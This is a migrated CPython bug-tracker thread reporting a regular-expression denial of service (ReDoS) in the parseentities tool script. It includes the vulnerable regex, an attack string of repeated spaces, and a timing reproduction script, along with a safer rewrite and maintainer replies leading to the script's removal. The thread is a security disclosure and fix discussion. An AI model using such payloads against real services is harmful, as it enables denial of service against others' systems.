REDoS in parseentities #86087

Closed
yetingli mannequin opened this issue Oct 3, 2020 · 4 comments
Labels
3.9 only security fixes 3.10 only security fixes 3.11 only security fixes

Comments

@yetingli
Mannequin

yetingli mannequin commented Oct 3, 2020

BPO 41921
Nosy @malemburg, @serhiy-storchaka, @pablogsal, @yetingli

Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.


GitHub fields:

assignee = None
closed_at = None
created_at = <Date 2020-10-03.15:12:49.444>
labels = ['3.9', '3.10', '3.11']
title = 'REDoS in parseentities'
updated_at = <Date 2021-12-06.10:24:39.254>
user = 'https://github.com/yetingli'

bugs.python.org fields:

activity = <Date 2021-12-06.10:24:39.254>
actor = 'lemburg'
assignee = 'none'
closed = False
closed_date = None
closer = None
components = ['Demos and Tools']
creation = <Date 2020-10-03.15:12:49.444>
creator = 'yetingli'
dependencies = []
files = []
hgrepos = []
issue_num = 41921
keywords = []
message_count = 3.0
messages = ['377885', '378011', '407783']
nosy_count = 4.0
nosy_names = ['lemburg', 'serhiy.storchaka', 'pablogsal', 'yetingli']
pr_nums = []
priority = 'normal'
resolution = None
stage = None
status = 'open'
superseder = None
type = None
url = 'https://bugs.python.org/issue41921'
versions = ['Python 3.9', 'Python 3.10', 'Python 3.11']

@yetingli
Mannequin Author

yetingli mannequin commented Oct 3, 2020

Hi,

I find this regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' may get stuck on some input.
The vulnerable regex is located in

entityRE = re.compile('<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')

The ReDoS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

You can execute the following code to reproduce the ReDoS

from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")

Looking forward to your response!

Best,
Yeting Li
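
A way to parse the same declarations without the sub-pattern identified in the report, as an added example that is not part of this thread or of CPython: the header is matched by a regex whose quantifiers do not overlap, and the closing `-->` is located with `str.find`. `parse_entities`, `legacy_parse`, `SAMPLE` and `UNTERMINATED` are hypothetical names, and the sample declarations are constructed.

```python
import re

# Regex quoted in the issue, kept only to compare results on short benign input.
LEGACY_RE = re.compile(r'<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')

# Header only. Every quantifier is followed by a token it cannot match itself,
# so backtracking cannot find alternative ways to split the same text.
HEAD_RE = re.compile(r'<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- ')


def parse_entities(text):
    """Return {name: (charcode, comment)} (hypothetical helper, not CPython code)."""
    found = {}
    pos = 0
    while True:
        m = HEAD_RE.search(text, pos)
        if m is None:
            break
        end = text.find('-->', m.end())   # single forward scan, no backtracking
        if end == -1:
            break                         # no terminator anywhere after this point
        comment = text[m.end():end].strip(' ')
        if comment:
            found[m.group(1)] = (m.group(2), comment)
            pos = end + 3
        else:
            pos = m.end()                 # empty comment: skip this header
    return found


def legacy_parse(text):
    """Same result shape, driven by the regex from the issue; short trusted input only."""
    return {m.group(1): (m.group(2), m.group(3)) for m in LEGACY_RE.finditer(text)}


# Constructed sample input (not taken from the issue).
SAMPLE = (
    '<!ENTITY nbsp   CDATA "&#160;" -- no-break space -->\n'
    '<!ENTITY iexcl  CDATA "&#161;" --   inverted exclamation mark   -->\n'
    '<!ENTITY note   CDATA "&#162;" -- spans\ntwo lines -->\n'
)
# Input shape from the report: header, then spaces, and no closing "-->".
UNTERMINATED = '<!ENTITY a CDATA "a" -- ' + ' ' * 200_000

if __name__ == '__main__':
    print(parse_entities(SAMPLE))
    print(parse_entities(UNTERMINATED))   # empty dict
```

The comment text is trimmed with `strip(' ')` after the terminator is found, which replaces the ` +` and ` *` parts of the original pattern that competed with the lazy group for the same spaces.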

@yetingli yetingli mannequin added 3.7 (EOL) end of life 3.8 (EOL) end of life 3.10 only security fixes 3.9 only security fixes labels Oct 3, 2020
@pablogsal
Member

Without evaluating the validity of the regex vulnerability, it is important to note that the files in Tools/scripts are not part of the standard library and therefore they aren't a valid attack vector.

@iritkatriel iritkatriel added 3.11 only security fixes and removed 3.7 (EOL) end of life 3.8 (EOL) end of life labels Dec 6, 2021
@malemburg
Member

Interesting that the tool still exists. It uses mxTextTools, but in a non-packaged version, so it's been broken for two decades now :-)

I think it's safe to remove it from Tools\scripts.

@ezio-melotti
Member

Tools/scripts/parseentities.py has been removed in #92504.
